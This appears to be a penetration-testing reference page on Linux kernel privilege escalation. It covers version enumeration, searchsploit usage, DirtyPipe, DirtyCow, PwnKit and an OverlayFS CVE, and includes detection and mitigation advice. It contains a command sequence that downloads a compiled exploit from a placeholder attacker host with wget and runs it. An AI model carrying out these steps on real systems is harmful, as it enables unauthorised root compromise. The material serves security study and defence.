Kernel Exploits
Overview
Kernel exploits target vulnerabilities in the Linux kernel itself to escalate from any user to root. They are a last resort — kernel exploits can crash the system, leave forensic artifacts, and are version-specific. Always exhaust misconfigurations (sudo, SUID, cron, capabilities) before attempting kernel exploitation. That said, on unpatched systems they provide reliable escalation regardless of application-level hardening.
ATT&CK Mapping
- Tactic: TA0004 - Privilege Escalation
- Technique: T1068 - Exploitation for Privilege Escalation
Prerequisites
- Shell access on the target system
- Kernel version identified (
uname -r) - Compiler available on target (or ability to cross-compile and transfer)
- Understanding that kernel exploits can cause system instability
Techniques
Identifying the Kernel Version
# Kernel version
uname -r
uname -a
# Distribution and version
cat /etc/os-release
cat /etc/issue
lsb_release -a 2>/dev/null
# Architecture
uname -m
Searching for Exploits
# searchsploit (Exploit-DB offline database)
# https://gitlab.com/exploit-database/exploitdb
searchsploit linux kernel <version>
searchsploit linux kernel 5.4
# Filter by privilege escalation
searchsploit linux kernel <version> privilege escalation
# Copy exploit to current directory
searchsploit -m <exploit_id>
searchsploit -m 40839
Notable Kernel Exploits
DirtyPipe (CVE-2022-0847) — Linux 5.8+, fixed in 5.16.11 / 5.15.25 / 5.10.102:
Overwrites data in arbitrary read-only files by abusing the pipe mechanism. Reliable, does not crash the system. Can overwrite /etc/passwd or inject into SUID binaries.
# Check if vulnerable
uname -r
# Vulnerable: kernel >= 5.8 AND kernel < 5.16.11 (mainline)
# OR kernel >= 5.15 AND < 5.15.25 (LTS)
# OR kernel >= 5.10 AND < 5.10.102 (LTS)
DirtyCow (CVE-2016-5195) — Linux 2.6.22 to 4.8.2:
Race condition in copy-on-write allows writing to read-only memory mappings. Multiple exploit variants exist (overwrite /etc/passwd, inject into SUID binaries).
# Check if vulnerable
uname -r
# Vulnerable: 2.6.22 <= kernel < 4.8.3 (fixed in 4.8.3)
# See CVE-2016-5195 NVD entry for distribution-specific backport ranges
PwnKit (CVE-2021-4034) — polkit pkexec:
Memory corruption in pkexec (installed by default on most distributions). Not technically a kernel exploit but provides root-level escalation. Affects virtually all Linux distributions with polkit installed.
# Check if pkexec is installed and SUID
ls -la /usr/bin/pkexec
# -rwsr-xr-x 1 root root ... /usr/bin/pkexec
CVE-2023-0386 — Linux 5.11 to 6.1.8 (fixed in 6.1.9 / 6.2 mainline):
OverlayFS privilege escalation: SUID files copied from a FUSE-mounted filesystem into an overlayfs mount retain setuid and execute with elevated privileges.
Compilation and Execution
# If gcc is available on target
gcc exploit.c -o exploit
chmod +x exploit
./exploit
# If gcc is not available — cross-compile on attacker machine
# Match the target architecture
gcc -static exploit.c -o exploit # x86_64
# Transfer to target
python3 -m http.server 8080 # on attacker
wget http://<attacker>:8080/exploit # on target
chmod +x exploit
./exploit
Key compilation flags:
| Flag | Purpose |
|---|---|
-static |
Statically link — no library dependencies on target |
-m32 |
Compile for 32-bit on a 64-bit system |
-lpthread |
Link pthreads (needed by some exploits) |
-lcrypt |
Link crypt library (needed for password hash generation) |
Pre-compiled Exploit Sources
Searching for kernel exploits by version and downloading pre-compiled binaries is faster than compiling on-target. Check known repositories:
- Exploit-DB — search by CVE or kernel version
- searchsploit — offline Exploit-DB mirror, included in Kali
Always verify exploit source code before running — pre-compiled binaries from untrusted sources may contain backdoors.
Detection Methods
Network-Based Detection
- File transfers of compiled exploits (wget, curl to suspicious URLs)
- Not directly detectable on the network — exploitation is local
Host-Based Detection
- Unexpected kernel crashes or oops messages in
dmesg - New processes running as root spawned from unusual parent processes
- Compilation activity (
gcc,cc) on production systems - Files named
exploit,dirty,pwnkitin/tmpor writable directories - Auditd rules for
execveof binaries in/tmp,/dev/shm,/var/tmp
Mitigation Strategies
- Patch regularly — kernel updates fix the vulnerabilities these exploits target. Apply security patches promptly
- Restrict compilers — remove
gcc,cc,g++from production systems where compilation is not needed - Mount /tmp with noexec — prevents executing compiled exploits from
/tmp:mount -o remount,noexec /tmp - Use kernel hardening — enable SMEP, SMAP, KASLR, and kernel module signing
- Use grsecurity/PaX — additional kernel hardening patches (where available)
- Monitor for exploit indicators — audit file creation in world-writable directories, unexpected compilation activity
References
CVE References
- CVE-2022-0847 - DirtyPipe
- CVE-2016-5195 - DirtyCow
- CVE-2021-4034 - PwnKit (pkexec)
- CVE-2023-0386 - OverlayFS FUSE privilege escalation